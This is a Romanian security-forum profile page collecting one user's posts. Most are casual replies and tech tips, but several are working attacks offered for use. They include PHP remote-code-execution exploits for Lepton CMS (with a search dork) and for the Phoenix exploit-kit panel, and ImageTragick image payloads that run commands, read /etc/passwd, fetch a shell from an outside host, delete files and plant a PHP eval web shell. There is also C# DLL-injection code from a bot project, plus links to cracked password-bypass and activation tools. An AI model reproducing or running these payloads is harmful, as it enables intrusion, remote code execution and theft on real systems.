Jako
-
Posts
68 -
Joined
-
Last visited
Posts posted by Jako
-
-
Si-a cumparat cineva asa ceva sau a avut ocazia sa testeze?
-
On 8/20/2016 at 10:08 PM, tds2 said:
Salut,
Cine poate oferi, doar valide, fara emailuri generate.
Dau dedicate la schimb sau cere un pret.
Mai bine nu-l mai contactezi pe unic, am vazut ca lumea se plange de serviciile oferite de catre el.
-
11 hours ago, ManutaDeAur said:
Sunt sigur ca autorul articolului a trait o buna perioada din viata lui in India.
Ahahaha, buna asta
-
Bine, tata! Frumos grait-ai, jos palaria!
-
On 7/15/2016 at 4:17 AM, MihaiIonut said:
Voi incarca documentatiile aplicatiilor la voi pe forum si voi reveni saptamana viitoare si cu linkuri pentru videoclipurile private de pe YouTube cu demonstratiile - nu am avut timp sa le pun...
Pana luna viitoare le voi posta si pe GitHub; acum lucrez la o aplicatie medicala (scrisa in Solidity) folosind technologia Blockchain (Ethereum + DAO + smart contracts) si vreau sa o aduc la stadiul de prototip functional in curand...
Weekend placut.
Salut!
Cainii latra, ursul trece...
-
Tu in loc sa mergi la un doctor de specialitate, postezi pe un forum de securitate?
Imi pare rau ca ai probleme, dar nu e loc potrivit...
- 1
-
DLC Boot 2016 is a rescue disk that is used as a Recovery CD. The point is that if you are having problems such as Windows can not boot, missing MBR, want to format the hard drive, remove viruses and so on, you can simply use the DLC Boot 2016 to resolve these issue. DLC Boot 2016 is also able to backup / restore windows partition, create partitions, entering a locked Windows, and much more!
* Integrated Mini Windows 10 32/64 bit
* Integrated Mini Windows XP deducted from Hiren's version 15.2 and has been built, optimized again.TOOLS LIST:
Spoiler1. DOS Tools:
Backup Tools:
Norton Ghost 11.5.1
True Image Home 2016 19.6027
Other Tools:
Test LCD
MemTest86
Kon-Boot 2.4
Active Password Changer Pro 5.0
Offline XP/Vista/7 Password Changer
Disk Tools:
Acronis Disk Director Home 12.0.3270
Partition Guru Pro
HDD Regenerator 2011 12.11.2013
MHDD 4.6
HDAT2 4.5.3
NTFS4Dos 1.9
Smart Fdisk 2.05
Disk Patch 4.0.300
Samsung Quick Tool 1.9
Norton Disk Doctor 2002
Norton Disk Editor 2002
Partition Magic Pro 8.05
Ontrack Disk Manager 9.57
Partition Table Doctor 3.5
2. Mini Windows XP / 10 tools:
Tools for Mini Windows:
Add Fonts for Mini XP
Set DLC1Temp
Disable TeraCopy Pro 2.27
Enable TeraCopy Pro 2.27
Set PageFile
ImDisk Virtual Disk Driver 1.9.1
Clear Temp Folder
Disk Tools:
Partition Wizard Server Edition 9.1
Aomei Partition Assistant Server 6.2
Easeus Partition Master Unlimited 10.8
Macrorit Disk Partition Expert 3.9.0
Partition Guru Pro 4.8.0.256
Active Kill Disk 10.0.0.6
Crystal Disk Info 7.0.0
Crystal Disk Mark 5.1.2
Victoria 4.47
HD Tune Pro 5.60
BootICE 1.3.3.2
Grub4Dos Setup
HDD Low Level Format Tool 4.40
Raid Reconstructor 4.40
AOMEI NTFS to FAT32 Pro 2.0
LinuxReader 2.3
WinContig 2.0.0.2
Backup:
Acronis True Image Shell
True Image Home 2014 17.6673
True Image Home 2017 20.3031
Ghost32 12.0.0.4112
Miray HDClone Enterprise 6
Active Disk Image 7.0.4
Ghost Explorer 11.5.1.2266
GhostCast Server 11.5.0.2113
OneKey Ghost 14.5.8.215
Drivers:
Double Driver 4.1.0
3DP Chip 16.06
Network:
Maxthon 4.9.3.1000
Cent Browser 1.9.13.75
Internet Download Manager 6.25.21
TeamViewer 11.0.59518
GetAlbumMP3 2016.01.0.6
UltraSurf 15.04
Fix Internet 4.0
SoftPerfect Network Scanner 6.1.7
TFtpd32
DNS Jumper 2.0
Remote Computer Manager Enterprise 6.0.9
MyLanViewer 4.19.8
Change MAC Address 2.8.0.95
RealVNC Server 5.0.5
RealVNC Viewer 5.0.5
Wake Me On lan 1.76
Free WiFi Hotspot 3.2.1.0
Free WiFi Hotspot 4.0.1
Recovery:
R-Drive Image 6.0.6014
GetDataBack Simple 2.01
EASEUS Data Recovery Wizard Technician 9.9.0
Ontrack EasyRecovery Pro 10.0.2.3
MiniTool Power Data Recovery 7.0
iCare Data Recovery Pro 5.0
OO DiskRecovery Technician 11.0.17.0
CardRecovery 6.10.1210
Partition Find and Mount Pro 2.31
Active Partition Recovery 14.0.1
Active File Recovery 14.5.0
7 Data Recovery Suite 3.7
Hetman Partition Recovery 2.3
Diskgetor Data Recovery 3.58
MilfordSoft Data Recovery 4.0
Hardware Tools:
HWiNFO32 5.30.2880
CPU-Z 1.76.0
GPU-Z 0.8.9.0
Devlib GetDiskSerial 5.00
Hard Disk Serial Number Changer
Hardware Monitor 1.28.0
Video Memory Stress Test 1.7.116
Is My LCD OK 2.72
Passmark Keyboard Test 3.1.1000
BatteryMon 2.1.1004
Dead Pixel Tester 3.0
Key Tweak 2.3.0
Office:
Office 2007
Unikey 4.0 RC2
SumatraPDF 3.1.1
Antivirus:
Eset NOD32 4.2.71.2
Kaspersky TDSSKiller 3.1.0.9
Remove Fake Antivirus 1.99
Win32/Sality Remover 1.2.0.616
Windows Worms Doors Cleaner 1.4.1
BK Anti Macro Virus 3.1
TN Anti virus macro 4 and names for Excel
Windows Privacy Tweaker 2.0
System:
Total Uninstall Pro 6.16.0
Revo Uninstaller Pro 3.1.5
WinNTSetup 3.8.6
Avast Registry Editor
Defraggler Technician Edition 2.20.989
Fix Printer
Torchsoft Registry Workshop 5.0.0
PowerTool 4.5
Process Explorer 16.12
Fix NTLDR is Missing
NTBOOT AutoFix 2.6.0
Install NET Frame Win 8/10 (Offline
Active Load Hive
DLLRegSVR 1.1
The Ultimate PID Checker 1.1.3.590
Utilities:
Total Commander 8.52a Final
7Zip 15.14
CCleaner Technician Edition 5.15.5513
File Splitter Joiner 3.3
RAR Repair Tool 4.0.1
Resource Hacker 4.2.5
Turn Off Monitor 1.0
Blank And Secure 4.14
On Screen Keyboard
Mouse Emulator
UltraISO Premium 9.6.5.3237
BurnAware Professional 8.9
Nuclear Coffee Recover Keys 9.0.3.168
Duplicate File Finder 3.5.0.0
VLC Media Player 2.2.2
Free MP3 Cutter Joiner 10.7
RenameFile 11.4
SmartRipper 2.41
Check File Hash 1.0
USB Tools:
USB Disk Storage Format
USB Unhide 1.0
Test USB 1.4
Rufus 2.7.855
Flash Memory Toolkit 2.00
SD Formatter 4.0
NTFS Drive Protection 1.4
Password Tools:
Anti Deep Freeze 0.1
Anti Deep Freeze 0.4
CMOS DeAnimator 3.0
Active Password Changer Pro 7.0.9
Daossoft Windows Password
Tenorshare Windows Password 6.1
Admin Password Resetter
WebBrowser Password Viewer 1.70
PDF Password Remover 3.12
Get Password 1.0
Windows Gate 1.1
Nuclear Coffee Recover Passwords 1.0.0.26
Crack your Windows:
Remove WGA 1.2
RemoveWAT 2.2.6
Windows 7 Loader 2.2.2
HEU KMS Activator 10.0.0
Re-Loader Activator 2.2Download:
https://docs.google.com/uc?id=0BxTOYa030FZmcDNvOTNhWFU3c00&export=download
- 4
-
19 hours ago, Individual14xxx said:
Salut! Mi-am amintit ca am un oneplus one spart , l-am primit de la un prieten care i-a dat factory reset dupa ce si-a distrus display-ul. Telefonul e blocat in welcome screen , butoanele sunt functionale deci pot intra in recovery mode. Nu sunt deloc familiarizat cu android, habarnam cum pot instala android de pe pc cu un usb cable . Am incercat sa copiez "twrp-2.8.6.0-bacon.img" (nu stiu daca e ce trebuie) de pe pc in internal storage-ul telefonului via usb dar nimic , in win explorer mi-a aparut ca e acolo but for some reason telefonul nu vede acel img. Cineva binedispus sa ma ajute cu un sfat , tutorial , anything?
Sper ca m-am exprimat cat de cat bine , multumesc.
Din Recovery menu:
Wipe cache partition
Wipe data/factory reset
Inchide telefonul - shutdown
Scoate bateria pentru 30 de minute si lasa-l asa
Reporneste-l
Daca nu merge o sa te ajut eu. Vorbim pe chat sau prin pm.
-
Arata foarte bine! Ce nu-mi place este "Ajuta-ne cu un like!".
https://developers.google.com/speed/pagespeed/insights/?url=betit.ro
Rezolva problemele de aici.
https://chrome.google.com/webstore/detail/check-my-links/ojkcdipcgfaekbeaelaapakgnjflfglf?hl=en-GB
Poate iti este de folos si extensia asta.
https://developer.chrome.com/devtools/docs/network
Check HTTP requests.
https://www.betit.ro/sitemap_index.xml
???
- 1
-
Bine ai venit, sedere placuta!
- 1
-
13 hours ago, 006julieno said:
Bugetul este ok, dar nu ar merita sa platesc 200 euro lunar pentru o protectie ddos si 20 euro un vps, din cauza unoi copii care se joaca cu ddos .
Baiatu de la tni.ro are o protectie buna la dedicate si nu au probleme cu flood doar ca m-am certat cu el si nu mai pot achizitiona nimic de acolo .
@ La gazduire.com.ro mi-au suspendat vps-ul ca primea un atack prea puternic si nu-l puteau oprii si ii afecta multe servere .
Am sa iau de la ovh sa vedem ce este de capul lor .
- 1
-
<?php /* Lepton CMS v2.2.2 - Remote Code Execution Dork: intext:"Design by CMS-LAB" */ $target = "http://127.0.0.1/lepton/install/save.php"; $payload = "');?><?php echo '<pre>'; system(\$_GET['cmd']); die();?>"; function curl_post($url, $post_data) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 15); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1"); $output = curl_exec($ch); $info = curl_getinfo($ch); curl_close($ch); return $info; } $da = curl_post($target, "guid=E610A7F2-5E4A-4571-9391-C947152FDFB0&website_title=abc&lepton_url=a&default_timezone_string=Europe/London&default_language=EN&operating_system=linux&database_host=$payload&database_username=root&database_password=abc&database_name=test&table_prefix=abc_&admin_username=admin&admin_email=admin@admin.com&admin_password=admin&admin_repassword=admin"); if($da['http_code'] == 200) { echo "\nTada: Now visit /config.php?cmd= on target.\n"; } ?>
-
Stiu ca s-a mai discutat pe forum despre asta, dar poate cuiva ii sunt folositoare informatiile.
Should work for all image files (.jpg/.mvg/.svg/.png/etc.)
Exploit Image contents:
Spoilerpush graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|YOUR COMMAND HERE")'Example Image:
Spoilerpush graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|cat /etc/passwd")'
pop graphic-contextMore examples:
SpoilerExample #1:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|cat /etc/passwd")'
pop graphic-contextExample #2:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|ls -la")'
pop graphic-contextExample #3:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|wget -O shell.php http://site.com/shell.txt")'
pop graphic-contextHOW TO:
1. Find an Image uploader that uses ImageMagick to process images.
(Try it @ http://attack32.samsclass.info/im.htm)
2. Craft a malicious image file
3. If it is running a vulnerable version, you'll have full RCE!TRICKS:
1. It's possible to read arbitrary files from a web server by uploading an ImageMagick Vector Graphics file (MVG) that the web application processes with ImageMagick:
Spoilerpush graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-contextAs is the case with all of these vulnerabilities, the file doesn't need to be uploaded with a .mvg extension. You can change it to .png, .jpg, or anything else.
If the file doesn't exist, you'll see the @ symbol plus the filename as the output.
2. You can use a similar technique to delete a file, provided ImageMagick is built with support for it's ephemeral protocol:
Spoilerpush graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'ephemeral:/var/www/index.php'
pop graphic-context3. You can move files around, provided you're able to determine the location of uploaded files. This can be used to upload new files as well as overwrite existing files.
first_image.png:
Spoiler<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/var/www/uploads/second_image.png"/>
<write filename="/var/www/hi.php"/>
</image>second_image.png:
Spoilerpush graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
pop graphic-contextthird_image.png:
Spoilerpush graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
pop graphic-contextAdditional info can be read here.
HAVE FUN!
-
import argparse import validators def get_gate(f): gate = '' pe = f.read() print len(pe) if len(pe) >= 63000 and len(pe) <= 100000: i = pe.find('YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0') - 3 if i > 0: while pe[i] != '\x00' and i >= 0: gate = pe[i] + gate i -= 1 return gate parser = argparse.ArgumentParser(description='Extract Pony binary gate.') parser.add_argument('FILE', type=argparse.FileType('rb'), help='Pony binary') args = parser.parse_args() gate = get_gate(args.FILE) if validators.url(gate): print gate else: print 'Gate not found!'
VB6 version:
https://github.com/Xyl2k/Pony-gate-extractor
demo:
- 2
-
3 minutes ago, Andrei said:
@Jako Nu, din contra, it security e un domeniu care trebuie inteles (macar in linii mari) tocmai de cei care activeaza in afara domeniului. Iti recomand sa arunci o privire peste prezentarile din anii precedenti pentru a-ti face o idee de nivelul prezentarilor (http://def.camp/archives/) la care se adauga activitatile si concursurile ce se desfasoara in paralel cu concursul.
O sa ma uit, multumesc frumos!
-
-
#!/usr/bin/env ruby require "base64" File.open('lista.txt', 'r') do |f1| while line = f1.gets val= line.split(":") b64decode=Base64.decode64(val[1]) printf "%s%s%s\n",val[0],":",b64decode end end
in loc de lista.txt introdu numele listei tale.
-
13 hours ago, Cosminovici said:
Stiu ca securitatea de pe TOR nu este 100% si de aceea am nevoie de VPN ca sa maschez IP-ul.
NoScript -> Forbid scripts globally, fara plug-ins cum a spus si wildchild mai sus. Poti sa folosesti Tortilla si o masina virtuala.
http://download.crowdstrike.com/tortilla/Tortilla_v1.1.0_Beta.zip
https://github.com/CrowdStrike/Tortilla
Pe main OS instalezi Tortilla, rulezi masina virtuala si apoi in masina virtuala setezi sa foloseasca doar conexiunea creata de Tortilla.
- 1
-
6 minutes ago, Cosminovici said:
Salutare! Cum pot accesa Deep Web-ul? Din cate stiu eu am nevoie de browserul TOR si de VPN. Rog seriozitate.
Ai nevoie doar de Tor browser pentru a accesa reteaua .onion. Nu-ti trebuie VPN.
https://www.torproject.org/projects/torbrowser.html.en
Documenteaza-te putin inainte!
- 1
-
https://github.com/Xyl2k/XyliLabs-Ruins
Nu e cine stie ce dar poate fi folositor unora, pe partea de simple panel, e-mail sender, ban system, research pentru front-end.
Numai CSS, fara bootstrap.
S-a folosit de Google Maps si MaxMind library.
Alte resurse interesante si utile pt devi:
https://developers.google.com/chart/interactive/docs/gallery
-
<?php /* # # Phoenix Exploit Kit # - Remote Code Execution # : /includes/geoip.php */ $site = "http://127.0.0.1/phoenix/"; $target = "includes/geoip.php?bdr="; $payload = "passthru('uname -a')"; function curl_get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1"); $output = curl_exec($ch); curl_close($ch); return $output; } echo curl_get($site.$target.$payload); ?>
- 1
-
Spoiler
<?php
error_reporting(0);
function create_htaccess()
{
$content = "order deny,allow\ndeny from all";
if (!$file = fopen('database/.htaccess', 'w')) {
echo 'Cannot create .htaccess-file';
exit;
}
if (!fwrite($file, $content)) {
echo 'Cannot write into .htaccess-file';
exit;
}
fclose($file);
}
error_reporting(E_ALL);
ini_set('display_errors',0);
$filename = $_SERVER['SCRIPT_NAME'];
/* create SQLITE3-database */
class MyDB extends SQLite3
{
function __construct()
{
if (!file_exists('database/reqests.sqlite3')) {
mkdir('database', 0700) or die('Cannot create folder "database"');
create_htaccess();
$this->open('database/reqests.sqlite3', SQLITE3_OPEN_READWRITE|SQLITE3_OPEN_CREATE);
$this->exec('CREATE TABLE data (access_key char(32), content varchar(1048576), ip varchar(1048576))');
//the database shouldn't be accessed by everyone
chmod("database/database.sqlite3", 0600) or die('Cannot set access rights for database.sqlite3 (chmod 0600)');
} else {
//if it is the case, that you move the database file manually to the folder
chmod('database', 0700) or die('Cannot set access rights for "database"-folder (chmod 0700)');
chmod("database/database.sqlite3", 0600) or die('Cannot set access rights for "database.sqlite3"-file (chmod 0600)');
$this->open('database/reqests.sqlite3', SQLITE3_OPEN_READWRITE);
}
}
}
$db = new MyDB();
if (isset($_POST['text'])) {
//insert content to database
$bytes = openssl_random_pseudo_bytes(16, $cstrong);
$access_key = bin2hex($bytes);
$content = $db->escapestring($_POST['text']);
$db->exec("INSERT INTO data (access_key, content) VALUES ('$access_key', '$content',$user_get)");
$protocol = (isset($_SERVER['HTTPS'])) ? 'https' : http;
$body = "<br>Your <b>note</b> can be accessed here:<br><br>
<b>
<textarea>
http://195.3.144.88/note.php?akey=$access_key
</textarea></b>";
} else if (isset($_GET['akey'])) {
//access note if possible
$result = $db->query('SELECT content FROM data WHERE access_key =\''.$db->escapestring($_GET['akey']).'\'');
$body = $result->fetchArray(SQLITE3_ASSOC);
$body = '<pre>'.htmlspecialchars($body['content']).'</pre>';
unlink('database/database.sqlite3');
unlink('database/.htaccess');
rmdir('database');
} else {
$body = "<br><form action=\"$filename\"".' method="post">
<textarea style="" name="text" rows="4" cols="110"></textarea><br>
<input style="" type="submit" value="post" />
</form>';
}
/* HTML DATA TOP */
echo <<<END
<!doctype html>
<html>
<style type="text/css">
hr:before, hr:after {
position: absolute;
content: '';
height: 1em;
top: 0;
left: 0;
right: 0;
}
hr:before {
background: linear-gradient(90deg, #1abc9c 15%, #2ecc71 15%, #2ecc71 12%, #3498db 12%, #3498db 32%, #9b59b6 32%, #9b59b6 35%, #34495e 35%, #34495e 55%, #f1c40f 55%, #f1c40f 59%, #e67e22 59%, #e67e22 63%, #e74c3c 63%, #e74c3c 82%, #ecf0f1 82%, #ecf0f1 92%, #95a5a6 92%);
}
.navbar-x {
text-align: center; }
.navbar-x .nav {
position: relative;
overflow: hidden;
display: inline-block; }
.navbar-x .nav:hover.nav-pills > li.active > a, .navbar-x .nav:focus.nav-pills > li.active > a {
color: #eeeeee; }
.navbar-x .nav:hover.nav-pills > li.active > a:hover, .navbar-x .nav:hover.nav-pills > li.active > a:focus, .navbar-x .nav:focus.nav-pills > li.active > a:hover, .navbar-x .nav:focus.nav-pills > li.active > a:focus {
color: black;
background-color: inherit; }
.navbar-x .nav > li > a {
width: 104px;
color: #eeeeee;
transition: color 0.42s ease-in-out; }
.navbar-x .nav > li > a:hover, .navbar-x .nav > li > a:focus {
color: black;
background-color: inherit; }
.navbar-x .nav > li.active > a {
color: black;
background-color: inherit; }
.navbar-x .nav > li.bottom-bar {
transition: left 0.42s ease-in-out;
position: absolute;
height: 3px;
width: 104px;
bottom: 0;
background-color: ; }
.navbar-x .nav > li:nth-child(1).active ~ .bottom-bar {
left: 0px; }
.navbar-x .nav > li:nth-child(1):hover ~ .bottom-bar, .navbar-x .nav > li:nth-child(1):focus ~ .bottom-bar {
left: 0px !important; }
.navbar-x .nav > li:nth-child(2).active ~ .bottom-bar {
left: 100px; }
.navbar-x .nav > li:nth-child(2):hover ~ .bottom-bar, .navbar-x .nav > li:nth-child(2):focus ~ .bottom-bar {
left: 100px !important; }
.navbar-x .nav > li:nth-child(3).active ~ .bottom-bar {
left: 200px; }
.navbar-x .nav > li:nth-child(3):hover ~ .bottom-bar, .navbar-x .nav > li:nth-child(3):focus ~ .bottom-bar {
left: 200px !important; }
.navbar-x .nav > li:nth-child(4).active ~ .bottom-bar {
left: 300px; }
.navbar-x .nav > li:nth-child(4):hover ~ .bottom-bar, .navbar-x .nav > li:nth-child(4):focus ~ .bottom-bar {
left: 300px !important; }
.navbar-x .nav > li:nth-child(5).active ~ .bottom-bar {
left: 400px; }
.navbar-x .nav > li:nth-child(5):hover ~ .bottom-bar, .navbar-x .nav > li:nth-child(5):focus ~ .bottom-bar {
left: 400px !important; }
@import url("http://fonts.googleapis.com/css?family=Raleway");
html {
font-size: 16px;
}
body {
margin: 0;
font-family: Raleway;
}
ul {
margin: 2rem auto;
width: 600px;
}
ul li {
display: flex;
flex-direction: row;
padding: 0.5em;
list-style: none;
}
ul li .content {
flex: 1;
padding: 0.5em;
}
ul li [type=text] {
flex: 1;
margin-right: 1em;
padding: 0.1em;
border: 1px solid #ccc;
font-size: 1em;
}
ul li .checkbox [type=checkbox] {
display: none;
}
ul li .checkbox label {
display: block;
position: relative;
width: 30px;
height: 30px;
background-color: #27ae60;
border-radius: 50%;
}
ul li .checkbox label:before {
content: ' ';
display: block;
position: absolute;
left: 0;
top: 0;
right: 0;
bottom: 0;
background-color: #fff;
border-radius: 50%;
transform: scale(0.8);
transition: 0.1s;
}
ul li .checkbox [type=checkbox]:checked ~ label:before {
transform: scale(0.2);
}
ul li .button button {
display: block;
position: relative;
width: 30px;
height: 30px;
background-color: #2980b9;
border: none;
border-radius: 50%;
}
ul li .button button:before {
content: ' ';
display: block;
position: absolute;
left: 12px;
top: 7px;
border-width: 8px;
border-style: solid;
border-color: transparent transparent transparent #fff;
}
ul li:first-child {
margin-bottom: 1em;
}
h1 {
position: relative;
margin: 2rem 3em;
padding: 0.5em;
background-color: #e85041;
text-align: center;
color: #fff;
line-height: 1em;
}
h1:before,
h1:after {
content: ' ';
display: block;
position: absolute;
top: 0;
width: 0;
height: 0;
border-width: 1em;
border-style: solid;
border-color: #e85041 transparent;
}
h1:before {
left: -1em;
}
h1:after {
right: -1em;
}
container {
padding-right: 0;
padding-left: 25px;
margin-right: auto;
margin-left: auto;
}
.code_sample {
border: 1px solid #DADADA;
font-size: 12px;
margin-bottom: 10px;
margin-top: 10px;
}
html {height: 100%; width: 100%;}
body {padding:0 1%; width:98%; height:90%;}
h1 {width:100%; height:3%}
form {width:100%; height:90%;}
textarea {border:1px dashed black; width: 60%; height:10%; padding: 1%;}
input {margin-top:1px; border: 1px solid black;}
</style>
</head>
<body>
<hr />
<!-- getbootstrap -->
<link href="http://getbootstrap.com/dist/css/bootstrap.css" rel="stylesheet" type="text/css" />
<!-- /getbootstrap -->
<div class="navbar-x">
<div class="container">
<ul class="nav nav-pills">
<li><a href="#">Home</a></li><li><a href="note.php">Notes</a></li><li class="active"><a href="search.php">Search</a></li><li><a href="#">History</a></li><li><a href="index.php">Logout</a></li><li class="bottom-bar"></li>
</ul>
</div>
</div>
<ul>
<li><font color="black">Create a note and get a link.</font></li><br>
<li><font color="black">Copy the link and send it to whom you want to read the note.</font><br><br>
<li><font color="black">The note will self-destruct after being read.</font><br><br>
</ul>
</ul>
<br><center>
$body
</html>
END;
/* HTML DATA END */
?> -
Old darkode.com repository:
http://darkode.cybercrime-tracker.net
Directory listing script used for tracker:
http://web2.uconn.edu/webdev/doc/scripts.htm#file_list_script
-
using System; using System.Collections.Generic; using System.Text; using System.Threading; using System.Runtime.InteropServices; using System.Diagnostics; using System.IO; using System.Reflection; namespace alphabotcsharp { public class Injection { [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll", CharSet = CharSet.Auto)] public static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll", SetLastError = true)] static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); // privileges const int PROCESS_CREATE_THREAD = 0x0002; const int PROCESS_QUERY_INFORMATION = 0x0400; const int PROCESS_VM_OPERATION = 0x0008; const int PROCESS_VM_WRITE = 0x0020; const int PROCESS_VM_READ = 0x0010; // used for memory allocation const uint MEM_COMMIT = 0x00001000; const uint MEM_RESERVE = 0x00002000; const uint PAGE_READWRITE = 4; public static bool isInjected = false; [DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.Winapi)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool IsWow64Process( [In] IntPtr hProcess, [Out] out bool wow64Process ); static bool is64BitProcess = (IntPtr.Size == 8); static bool is64BitOperatingSystem = is64BitProcess || InternalCheckIsWow64(); public static int inject(string dllPath, Process tProcess) { Process targetProcess = tProcess; string dllName = dllPath; // the target process // geting the handle of the process - with required privileges IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); // searching for the address of LoadLibraryA and storing it in a pointer IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); // name of the dll we want to inject // alocating some memory on the target process - enough to store the name of the dll // and storing its address in a pointer IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // writing the name of the dll there UIntPtr bytesWritten; WriteProcessMemory(procHandle, allocMemAddress, Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten); // creating a thread that will call LoadLibraryA with allocMemAddress as argument CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero); return 0; } public static void Execute() { string rawDLL = String.Empty; if(is64BitOperatingSystem) { rawDLL = Path.Combine(Path.GetDirectoryName(Assembly.GetEntryAssembly().Location), "h64.dll"); } else { rawDLL = Path.Combine(Path.GetDirectoryName(Assembly.GetEntryAssembly().Location), "h32.dll"); } // Execution of injection Process proc = Process.GetProcessesByName("taskmgr")[0]; Injection.inject(rawDLL, proc); isInjected = true; } public static Boolean isInjectedAlready() { if(isInjected) { return true; } else { return false; } } public static bool InternalCheckIsWow64() { if ((Environment.OSVersion.Version.Major == 5 && Environment.OSVersion.Version.Minor >= 1) || Environment.OSVersion.Version.Major >= 6) { using (Process p = Process.GetCurrentProcess()) { bool retVal; if (!IsWow64Process(p.Handle, out retVal)) { return false; } return retVal; } } else { return false; } } } }
- 1
Parere Iphone 7
in Off-topic
Posted
http://www.gsmarena.com/nokia_lumia_930-6227.php
La precomanda nu-l ai inainte. La precomanda, uneori, poti beneficia de un pret mai bun/reducere si iti asigura produsul in cazul stocurilor limitate sau in cazul produselor populare care se vand foarte repede.